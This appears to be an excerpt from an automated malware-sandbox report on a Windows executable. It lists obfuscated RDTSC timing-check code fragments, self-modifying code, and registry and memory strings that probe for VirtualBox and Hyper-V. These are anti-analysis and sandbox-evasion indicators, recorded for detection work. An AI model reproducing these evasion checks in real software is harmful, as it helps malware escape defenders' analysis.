Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F75 second address: 7950F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F79 second address: 7950F7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F7F second address: 7950F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF10887397Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F8E second address: 7950FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov edx, 45F2192Eh 0x00000015 pop edi 0x00000016 pushfd 0x00000017 jmp 00007FF108C7BF14h 0x0000001c or ah, 00000078h 0x0000001f jmp 00007FF108C7BF0Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov edx, 759B06ECh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950FE8 second address: 7950FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950FEC second address: 7950FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950FF0 second address: 7950FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950FF6 second address: 7951013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951013 second address: 7951100 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d jmp 00007FF108873987h 0x00000012 lock cmpxchg dword ptr [edx], ecx 0x00000016 pushad 0x00000017 call 00007FF108873984h 0x0000001c jmp 00007FF108873982h 0x00000021 pop ecx 0x00000022 mov cx, dx 0x00000025 popad 0x00000026 pop edi 0x00000027 pushad 0x00000028 jmp 00007FF108873983h 0x0000002d pushfd 0x0000002e jmp 00007FF108873988h 0x00000033 add ecx, 6B261A88h 0x00000039 jmp 00007FF10887397Bh 0x0000003e popfd 0x0000003f popad 0x00000040 test eax, eax 0x00000042 jmp 00007FF108873986h 0x00000047 jne 00007FF176851F86h 0x0000004d jmp 00007FF108873980h 0x00000052 mov edx, dword ptr [ebp+08h] 0x00000055 pushad 0x00000056 movzx eax, di 0x00000059 mov esi, ebx 0x0000005b popad 0x0000005c mov eax, dword ptr [esi] 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF108873980h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951100 second address: 795113D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108C7BF11h 0x00000009 sub esi, 250EA466h 0x0000000f jmp 00007FF108C7BF11h 0x00000014 popfd 0x00000015 mov si, 6497h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx], eax 0x0000001e pushad 0x0000001f mov bx, cx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795113D second address: 795117C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF108873980h 0x0000000a and ax, 3F38h 0x0000000f jmp 00007FF10887397Bh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF108873980h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795117C second address: 795118B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795118B second address: 7951192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951192 second address: 79511A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [edx+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF108C7BF0Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511A8 second address: 79511C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511C0 second address: 79511C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511C4 second address: 79511C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511C8 second address: 79511CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511CE second address: 79511D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511D4 second address: 79511D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79511D8 second address: 795121F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b jmp 00007FF108873980h 0x00000010 mov eax, dword ptr [esi+0Ch] 0x00000013 jmp 00007FF108873980h 0x00000018 mov dword ptr [edx+0Ch], eax 0x0000001b jmp 00007FF108873980h 0x00000020 mov eax, dword ptr [esi+10h] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795121F second address: 7951223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951223 second address: 795128C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF108873989h 0x0000000c sbb cx, 3606h 0x00000011 jmp 00007FF108873981h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [edx+10h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx ebx, ax 0x00000021 pushfd 0x00000022 jmp 00007FF108873984h 0x00000027 sub ecx, 3E4B07D8h 0x0000002d jmp 00007FF10887397Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795128C second address: 79512BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108C7BF0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79512BB second address: 795134F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, CAB2h 0x00000007 jmp 00007FF108873983h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+14h], eax 0x00000012 jmp 00007FF108873986h 0x00000017 mov eax, dword ptr [esi+18h] 0x0000001a pushad 0x0000001b movzx ecx, bx 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FF108873986h 0x00000025 sbb cx, 5158h 0x0000002a jmp 00007FF10887397Bh 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov dword ptr [edx+18h], eax 0x00000035 jmp 00007FF10887397Fh 0x0000003a mov eax, dword ptr [esi+1Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF108873985h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795134F second address: 7951355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951355 second address: 7951375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108873981h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951375 second address: 795137B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795137B second address: 7951380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951380 second address: 79513F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+20h] 0x0000000d pushad 0x0000000e push ebx 0x0000000f jmp 00007FF108C7BF0Ch 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF108C7BF0Bh 0x0000001b jmp 00007FF108C7BF13h 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [edx+20h], eax 0x00000025 pushad 0x00000026 mov edi, esi 0x00000028 push eax 0x00000029 pop eax 0x0000002a popad 0x0000002b mov eax, dword ptr [esi+24h] 0x0000002e jmp 00007FF108C7BF19h 0x00000033 mov dword ptr [edx+24h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF108C7BF0Dh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79513F4 second address: 79514AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+28h] 0x0000000e jmp 00007FF10887397Fh 0x00000013 mov dword ptr [edx+28h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FF108873984h 0x0000001d adc ecx, 5FD1E128h 0x00000023 jmp 00007FF10887397Bh 0x00000028 popfd 0x00000029 mov bl, ch 0x0000002b popad 0x0000002c mov ecx, dword ptr [esi+2Ch] 0x0000002f jmp 00007FF10887397Bh 0x00000034 mov dword ptr [edx+2Ch], ecx 0x00000037 jmp 00007FF108873986h 0x0000003c mov ax, word ptr [esi+30h] 0x00000040 pushad 0x00000041 mov dl, ch 0x00000043 jmp 00007FF108873983h 0x00000048 popad 0x00000049 mov word ptr [edx+30h], ax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 movsx edi, si 0x00000053 pushfd 0x00000054 jmp 00007FF10887397Ch 0x00000059 jmp 00007FF108873985h 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79514AF second address: 79514D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108C7BF0Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79514D7 second address: 7951534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108873987h 0x00000009 adc ecx, 23D0909Eh 0x0000000f jmp 00007FF108873989h 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov word ptr [edx+32h], ax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF108873986h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951534 second address: 7951580 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007FF108C7BF0Dh 0x0000000b jmp 00007FF108C7BF0Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esi+34h] 0x00000017 jmp 00007FF108C7BF16h 0x0000001c mov dword ptr [edx+34h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF108C7BF0Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951580 second address: 7951586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951586 second address: 79515A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, CFD0h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79515A7 second address: 79515AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79515AC second address: 79515D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx eax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FF176C5A066h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF108C7BF15h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79515D6 second address: 79515EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79515EB second address: 795160C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dh, 86h 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 795160C second address: 7951612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951612 second address: 7951632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108C7BF12h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7951632 second address: 79516AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108873981h 0x00000009 sub ax, 5326h 0x0000000e jmp 00007FF108873981h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 or dword ptr [edx+40h], FFFFFFFFh 0x0000001d jmp 00007FF10887397Ah 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF10887397Dh 0x0000002c sbb si, F336h 0x00000031 jmp 00007FF108873981h 0x00000036 popfd 0x00000037 call 00007FF108873980h 0x0000003c pop esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79516AC second address: 79516E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007FF108C7BF10h 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FF108C7BF0Dh 0x00000018 mov bl, ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79A0B7D second address: 79A0B9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79A0B9A second address: 79A0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0039 second address: 78E004F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E004F second address: 78E0053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0053 second address: 78E0057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0057 second address: 78E005D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E067C second address: 78E06CD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF108873986h 0x00000008 xor ecx, 15641558h 0x0000000e jmp 00007FF10887397Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007FF108873988h 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 mov dx, 00CEh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0A32 second address: 78E0A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0A38 second address: 78E0AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF10887397Ch 0x00000009 sub al, FFFFFFB8h 0x0000000c jmp 00007FF10887397Bh 0x00000011 popfd 0x00000012 jmp 00007FF108873988h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF10887397Eh 0x00000022 sbb cx, F248h 0x00000027 jmp 00007FF10887397Bh 0x0000002c popfd 0x0000002d mov edi, esi 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FF108873985h 0x00000036 xchg eax, ebp 0x00000037 jmp 00007FF10887397Eh 0x0000003c mov ebp, esp 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AC4 second address: 78E0AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AC8 second address: 78E0ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0ACC second address: 78E0AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AD2 second address: 78E0AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AD8 second address: 78E0AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF108C7BF19h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AFC second address: 78E0B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930A1E second address: 7930A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108C7BF10h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930A3D second address: 7930A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930A43 second address: 7930A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930A47 second address: 7930A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910012 second address: 7910038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov ch, 48h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FF108C7BF12h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910038 second address: 791003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 791003C second address: 7910042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Special instruction interceptor: First address: 12E0A25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Special instruction interceptor: First address: 148966B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Special instruction interceptor: First address: 1487B77 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Special instruction interceptor: First address: 14B2EEB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Special instruction interceptor: First address: 12E0984 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00D79980 rdtsc 0_2_00D79980
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00B9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00B9255D
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00B929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00B929FF
Source: TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: TX5LAYBZRI.exe, 00000000.00000003.2065120521.00000000020C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: TX5LAYBZRI.exe | Binary or memory string: Hyper-V RAW
